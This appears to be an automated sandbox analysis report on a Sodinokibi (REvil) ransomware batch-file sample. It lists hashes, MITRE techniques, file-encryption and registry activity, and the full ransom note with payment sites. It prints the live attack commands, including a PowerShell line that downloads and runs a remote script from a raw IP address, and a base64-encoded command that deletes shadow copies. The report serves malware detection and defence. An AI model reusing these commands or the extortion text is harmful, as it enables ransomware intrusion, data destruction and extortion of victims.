sodinokibi | 811d39f86a8efff6544dcd852c24a3fe2e5446f5eb7fdd9e740b424a221ab366

General

Target

42HVHYvi.bat
Size

192B
MD5

a9075a0e43612a388eda0d4643037a34
SHA1

6bfb53b342e2518e07955676e5a8f18717970504
SHA256

811d39f86a8efff6544dcd852c24a3fe2e5446f5eb7fdd9e740b424a221ab366
SHA512

9a9275289c65b19cc5e4d94572b1e6dfbe84c47a028193d0c142a363e0b279e0cb217d2d63c759839730ec8158460da427cb9ac354a124a9f6ae73ab7fa063ee

Score

10^/10

ransomware persistence evasion spyware trojan sodinokibi

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/42HVHYvi

Extracted

Path

C:\8k238139d2-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 8k238139d2. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7BCBB476BE938F02 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/7BCBB476BE938F02 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: jIuceZq0MfvqpcB2a0DblRrUDssBCwBSx2GujTaot5QEEpzm/uwOIxzsX8hNpdeM yZ04oCQsvSgnG6EZtNHBU1j4I2KjiWbRo+YyhwZM4ZZisjggrw1VoTfUwyiP39pX RHGBk3iIzbHbOtmXmZUT6gJR/3FS6LhPcN9iUnU9GvY+sczlVnh0js/8rbQs4fgr JjBq99XiAswy9+gi1zP8PImrBB+P6YpnFve5+QTXKK4dAl/CO7L2UynyDagSEz6P fWENC5cLy9LA2OZkR7LqnizQmszAc2lHkDojFDn7WzFUjiKlf3qsjYH13qhh9rBP 9z/9QemKO34+tnPv/YJNuz/fBabgqSqJ23fLT7SZ1IdWn97O/BSKy8gY3V/z5UW+ So/mjxJKOt+k/moaXKiMaV+/XKwdh6Mn2XaL6r5JlxfYuEgH20HvQinwFxhrtnCR LxKGJo9cMFhufnYFeF6lfaylc42mgSdiDUafs4IibK11zcr2ehO1LjchLHwH/2y+ sZvL9O7kTYqh4lkudCes5TwNU7+G4NMDDYyiZj41opL3mW4P90G49D/jvHQ1a0Zm ENADGweWDk144/FyD9Ov8hrntwpEG0WPVjrtAb4fuVG2W3kiKyWoMNprDpJH8UCa udmuBJbF25uZeQRPwrsD9EYeQ2EMANH/1JeGAio2BIYXC95z4d3Jg5zrEdC0TS1U p88Y21KCB61U3QstxaREXKyZXf5LowT9Wj3Do3bKq+Coce8hmKQZg5TJgcZAb1Ee PmtsvZGVdayOmXGUYpDMexoScxCW42vXbCjyPjQNGQrZdniqYeBIkLHfy8Y9fmDO xa3LlGcpTLYHBVbQYxfN73E/DVTdUIqV07xw1ut5ojERWphj2Z0bHvtgm4vm0CBF bNEKhgbGO+0w7WtTzVr5s39gf1XJZ1fdEfBdoD+a+ak/OUPsQUjWXfP8/XuYxEKT 0BDPsaQfr5UoXNZYgsigqG8bI+2dyzib2Pv6GQMEjTSXXXq/cZetszBitJJJnpnB egd/Jf3r5MozaiFHKPnDJ0Ly3lJL/fQ8Nio7kicAcMVVOFb6t1XQ5L9BhJZEojya ZWkJHLSQcwmBCaqNrItClKmJtDpU3YOZUw6UEcV2eYhACUE1y8W6nN3qxTpyctjj iuqEpAVZNlMZ7YcKKet2D+Lxd88GW4oXDzQquTYLQd5UjAV3l25TGexA+nkEXQ+L TkOeb56/0cy99FP97gt4dwkuG3l2P4s3pfltI1gOjUvSVV72tr66RokxxMbskFd7 l9j1cxpCDkpqV5SI7TxSOrt14GeiEO8GmDCli/jp1NnVWeP9O832SA== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7BCBB476BE938F02

http://decryptor.cc/7BCBB476BE938F02

Signatures

Suspicious use of WriteProcessMemory 5 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 1992 wrote to memory of 2016	1992	cmd.exe	powershell.exe
PID 2016 wrote to memory of 1580	2016	powershell.exe	powershell.exe
PID 2016 wrote to memory of 1580	2016	powershell.exe	powershell.exe
PID 2016 wrote to memory of 1580	2016	powershell.exe	powershell.exe
PID 2016 wrote to memory of 1580	2016	powershell.exe	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

2016 powershell.exe
2016 powershell.exe
2016 powershell.exe
1580 powershell.exe
1580 powershell.exe

pid	process
2016	powershell.exe
2016	powershell.exe
2016	powershell.exe
1580	powershell.exe
1580	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\z70531orlv90z.bmp"	powershell.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

2016 powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe

pid	process
2016	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeDebugPrivilege	1580	powershell.exe
Token: SeBackupPrivilege	1736	vssvc.exe
Token: SeRestorePrivilege	1736	vssvc.exe
Token: SeAuditPrivilege	1736	vssvc.exe

Blacklisted process makes network request 32 IoCs

Processes:

powershell.exe

flow	pid	process
1	2016	powershell.exe
7	2016	powershell.exe
8	2016	powershell.exe
10	2016	powershell.exe
12	2016	powershell.exe
13	2016	powershell.exe
15	2016	powershell.exe
17	2016	powershell.exe
19	2016	powershell.exe
21	2016	powershell.exe
23	2016	powershell.exe
25	2016	powershell.exe
27	2016	powershell.exe
28	2016	powershell.exe
30	2016	powershell.exe
34	2016	powershell.exe
37	2016	powershell.exe
39	2016	powershell.exe
40	2016	powershell.exe
42	2016	powershell.exe
44	2016	powershell.exe
46	2016	powershell.exe
48	2016	powershell.exe
49	2016	powershell.exe
51	2016	powershell.exe
53	2016	powershell.exe
54	2016	powershell.exe
56	2016	powershell.exe
58	2016	powershell.exe
60	2016	powershell.exe
62	2016	powershell.exe
64	2016	powershell.exe

Discovering connected drives 3 TTPs 7 IoCs

ransomware

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

powershell.exepowershell.execmd.exe

description	ioc	process
File opened (read-only)	\??\B:	powershell.exe
File opened (read-only)	\??\E:	powershell.exe
File opened (read-only)	\??\F:	powershell.exe
File opened (read-only)	\??\C:	powershell.exe
File opened (read-only)	\??\C:	cmd.exe
File opened (read-only)	\??\C:	powershell.exe
File opened (read-only)	\??\A:	powershell.exe

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Drops file in Program Files directory 37 IoCs

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Program Files\WatchRepair.aifc => \??\c:\program files\WatchRepair.aifc.8k238139d2	powershell.exe
File opened for modification	\??\c:\program files\CompareDeny.snd	powershell.exe
File opened for modification	\??\c:\program files\FindSave.aif	powershell.exe
File renamed	C:\Program Files\FindSave.aif => \??\c:\program files\FindSave.aif.8k238139d2	powershell.exe
File renamed	C:\Program Files\InitializeHide.wma => \??\c:\program files\InitializeHide.wma.8k238139d2	powershell.exe
File renamed	C:\Program Files\UnprotectShow.3gp => \??\c:\program files\UnprotectShow.3gp.8k238139d2	powershell.exe
File created	\??\c:\program files (x86)\8k238139d2-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\RegisterEnable.png	powershell.exe
File renamed	C:\Program Files\ResolveApprove.otf => \??\c:\program files\ResolveApprove.otf.8k238139d2	powershell.exe
File renamed	C:\Program Files\ConvertApprove.iso => \??\c:\program files\ConvertApprove.iso.8k238139d2	powershell.exe
File opened for modification	\??\c:\program files\FormatConnect.mhtml	powershell.exe
File renamed	C:\Program Files\LockFormat.asp => \??\c:\program files\LockFormat.asp.8k238139d2	powershell.exe
File opened for modification	\??\c:\program files\MountPublish.wav	powershell.exe
File opened for modification	\??\c:\program files\UnprotectShow.3gp	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\8k238139d2-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\AddStop.mpeg	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\8k238139d2-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ProtectSkip.ram	powershell.exe
File opened for modification	\??\c:\program files\UnblockExport.xltx	powershell.exe
File renamed	C:\Program Files\UnblockExport.xltx => \??\c:\program files\UnblockExport.xltx.8k238139d2	powershell.exe
File renamed	C:\Program Files\AddStop.mpeg => \??\c:\program files\AddStop.mpeg.8k238139d2	powershell.exe
File opened for modification	\??\c:\program files\WaitCheckpoint.i64	powershell.exe
File renamed	C:\Program Files\ProtectSkip.ram => \??\c:\program files\ProtectSkip.ram.8k238139d2	powershell.exe
File opened for modification	\??\c:\program files\WatchRepair.aifc	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\8k238139d2-readme.txt	powershell.exe
File renamed	C:\Program Files\MountPublish.wav => \??\c:\program files\MountPublish.wav.8k238139d2	powershell.exe
File opened for modification	\??\c:\program files\MergeRegister.pdf	powershell.exe
File opened for modification	\??\c:\program files\InitializeHide.wma	powershell.exe
File opened for modification	\??\c:\program files\LockFormat.asp	powershell.exe
File renamed	C:\Program Files\FormatConnect.mhtml => \??\c:\program files\FormatConnect.mhtml.8k238139d2	powershell.exe
File opened for modification	\??\c:\program files\ResolveApprove.otf	powershell.exe
File opened for modification	\??\c:\program files\ConvertApprove.iso	powershell.exe
File renamed	C:\Program Files\CompareDeny.snd => \??\c:\program files\CompareDeny.snd.8k238139d2	powershell.exe
File renamed	C:\Program Files\MergeRegister.pdf => \??\c:\program files\MergeRegister.pdf.8k238139d2	powershell.exe
File renamed	C:\Program Files\RegisterEnable.png => \??\c:\program files\RegisterEnable.png.8k238139d2	powershell.exe
File renamed	C:\Program Files\WaitCheckpoint.i64 => \??\c:\program files\WaitCheckpoint.i64.8k238139d2	powershell.exe
File created	\??\c:\program files\8k238139d2-readme.txt	powershell.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b0601050507030406082b0601050507030106082b0601050507030206082b06010505070308060a2b0601040182370a0304060a2b0601040182370a030c6200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0400000001000000100000001d3554048578b03f42424dbf20730a3f0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b19000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c03000000010000001400000002faf3e291435468607857694df5e45b688518681d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b0601050507030720000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E\Blob = 040000000100000010000000d63981c6527e9669fcfcca66ed05f2960f000000010000002000000071b437f087f3700ffd4e2fa46f42b6b810d7bf19adfedf951c023edd65b50b0519000000010000001000000060e2dc65295f1062e558f3fef235ed3c030000000100000014000000b51c067cee2b0c3df855ab2d92f4fe39d4e70f0e1d000000010000001000000054e2cd85ba79cda018fed9e6a863aa461400000001000000140000007c0c321fa7d9307fc47d68a362a8a1ceab075b276200000001000000200000002ce1cb0bf9d2f9e102993fbe215152c3b2dd0cabde1c68e5319b839154dbb7f553000000010000002500000030233021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070308060a2b0601040182370a030406082b0601050507030606082b060105050703070b000000010000005400000053007400610072006600690065006c006400200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079002000132020004700320000002000000001000000e1030000308203dd308202c5a003020102020100300d06092a864886f70d01010b050030818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d204732301e170d3039303930313030303030305a170d3337313233313233353935395a30818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bdedc103fcf68ffc02b16f5b9f48d99d79e2a2b703615618c347b6d7ca3d352e8943f7a1699bde8a1afd13209cb44977322956fdb9ec8cdd22fa72dc276197eef65a84ec6e19b9892cdc845bd574fb6b5fc589a51052894655f4b8751ce67fe454ae4bf85572570219f8177159eb1e280774c59d48be6cb4f4a4b0f364377992c0ec465e7fe16d534c62afcd1f0b63bb3a9dfbfc7900986174cf26824063f3b2726a190d99cad40e75cc37fb8b89c159f1627f5fb35f6530f8a7b74d765a1e765e34c0e89656998ab3f07fa4cdbddc32317c91cfe05f11f86baa495cd19994d1a2e3635b0976b55662e14b741d96d426d4080459d0980e0ee6defcc3ec1f90f10203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147c0c321fa7d9307fc47d68a362a8a1ceab075b27300d06092a864886f70d01010b050003820101001159fa254f036f94993b9a1f828539d47605945ee128936d625d09c2a0a8d4b07538f1346a9de49f8a862651e62cd1c62d6e95204a9201ecb88a677b31e2672e8c9503262e439d4a31f60eb50cbbb7e2377f22ba00a30e7b52fb6bbb3bc4d379514ecd90f4670719c83c467a0d017dc558e76de68530179a24c410e004f7e0f27fd4aa0aff421d37ed94e5645912207738d3323e3881759673fa688fb1cbce1fc5ecfa9c7ecf7eb1f1072db6fcbfcaa4bfd097054abcea18280290bd5478092171d3d17d1dd916b0a9613dd00a0022fcc77bcb0964450b3b4081f77d7c32f598ca588e7d2aee90597364f936745e25a1f566052e7f3915a92afb508b8e8569f4	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\42HVHYvi.bat"
1⤵
- Suspicious use of WriteProcessMemory
- Discovering connected drives
PID:1992

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/42HVHYvi');Invoke-OCJPTYYSX;Start-Sleep -s 10000"
2⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Sets desktop wallpaper using registry
- Drops file in System32 directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Discovering connected drives
- Drops file in Program Files directory
- Modifies system certificate store
PID:2016

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Discovering connected drives
PID:1580

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1736

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_269fc7d6-389e-41b0-b64b-7c0856c31fc7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_81674632-3ac2-413b-8a14-55e00bb0eca6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_aab85910-7ac3-4fc4-bbec-5e43e50581e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d23a525b-13be-4981-917b-c14eaa6ecb8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_da5c55b5-c1bb-4597-a419-36df000a20bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e09b2a6a-d455-4170-a504-c8cdd16a5e67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Download Submit

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads